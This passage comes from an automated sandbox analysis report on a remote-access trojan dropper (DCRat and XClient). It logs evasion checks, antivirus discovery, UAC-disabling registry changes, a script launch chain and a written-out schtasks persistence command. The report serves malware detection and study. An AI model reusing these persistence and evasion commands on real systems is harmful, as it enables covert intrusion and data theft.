                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: CC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: 1A6A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeMemory allocated: F70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeMemory allocated: 1A900000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeMemory allocated: 2C90000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeMemory allocated: 1AEC0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeMemory allocated: AC0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeMemory allocated: A00000 memory reserve | memory write watch
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeMemory allocated: 1A8C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWindow / User API: threadDelayed 2919Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWindow / User API: threadDelayed 6843Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWindow / User API: threadDelayed 1134
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWindow / User API: threadDelayed 1242
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeWindow / User API: threadDelayed 368
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeWindow / User API: threadDelayed 365
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeWindow / User API: threadDelayed 362
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 8528Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 8532Thread sleep count: 2919 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 8532Thread sleep count: 6843 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe TID: 7536Thread sleep count: 1134 > 30
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe TID: 7540Thread sleep count: 1242 > 30
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe TID: 7560Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exe TID: 7608Thread sleep count: 368 > 30
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exe TID: 4476Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exe TID: 8180Thread sleep count: 365 > 30
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exe TID: 7420Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe TID: 7416Thread sleep count: 362 > 30
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe TID: 7988Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C018647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7C018647C
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C019ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7C019ECE0
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01B3130 FindFirstFileExA,0_2_00007FF7C01B3130
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_008DA5F4
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_008EB8E0
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01A5134 VirtualQuery,GetSystemInfo,0_2_00007FF7C01A5134
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeThread delayed: delay time: 922337203685477
                      Source: DCRatBuild.exe, 00000002.00000003.1710608400.0000000002B01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                      Source: DCRatBuild.exe, 00000002.00000003.1713100279.0000000002B01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yL
                      Source: ServerWeb.exe, 00000008.00000002.2233912155.000000001C81F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: Result.exe, 00000001.00000002.1703441913.0000000000AB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                      Source: XClient.exe, 00000003.00000002.4194286088.000000001B690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWwIns%SystemRoot%\system32\mswsock.dlltivityStateQuery activityName="*">
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeAPI call chain: ExitProcess graph end nodegraph_2-23608
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01A6940 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7C01A6940
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008F753D mov eax, dword ptr fs:[00000030h]2_2_008F753D
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01B41B0 GetProcessHeap,0_2_00007FF7C01B41B0
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess token adjusted: Debug
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess token adjusted: Debug
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess token adjusted: Debug
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01A6940 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7C01A6940
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01A6B24 SetUnhandledExceptionFilter,0_2_00007FF7C01A6B24
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01AAC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7C01AAC68
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01A5CE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7C01A5CE0
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008EF063 SetUnhandledExceptionFilter,2_2_008EF063
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008EF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_008EF22B
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_008F866F
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008EEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_008EEF05
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C019ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7C019ECE0
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeProcess created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" "Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 8 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C018DBDC cpuid 0_2_00007FF7C018DBDC
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF7C019DE44
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: GetLocaleInfoW,GetNumberFormatW,2_2_008EA63C
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeQueries volume information: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeQueries volume information: C:\Program Files (x86)\jDownloader\config\conhost.exe VolumeInformation
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeQueries volume information: C:\Program Files (x86)\jDownloader\config\conhost.exe VolumeInformation
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe VolumeInformation
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C01A400C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7C01A400C
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C0186768 GetVersionExW,0_2_00007FF7C0186768
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created: PromptOnSecureDesktop 0
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                      Source: XClient.exe, 00000003.00000002.4155365471.0000000000872000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.4155365471.00000000008C1000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.4194286088.000000001B690000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.4194286088.000000001B702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000029.00000002.1997852879.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1889481824.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1889481824.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1976381139.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.1958522017.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.1997852879.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1902459797.000000001290D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ServerWeb.exe PID: 7488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 7280, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 2008, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe PID: 7368, type: MEMORYSTR
                      Source: Yara matchFile source: Result.exe, type: SAMPLE
                      Source: Yara matchFile source: 1.3.Result.exe.b10a30.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.Result.exe.7c9678.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.XClient.exe.480000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.Result.exe.7c9678.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.Result.exe.b10a30.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Result.exe.b08218.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.Result.exe.466afd.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.Result.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.Result.exe.415eec.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
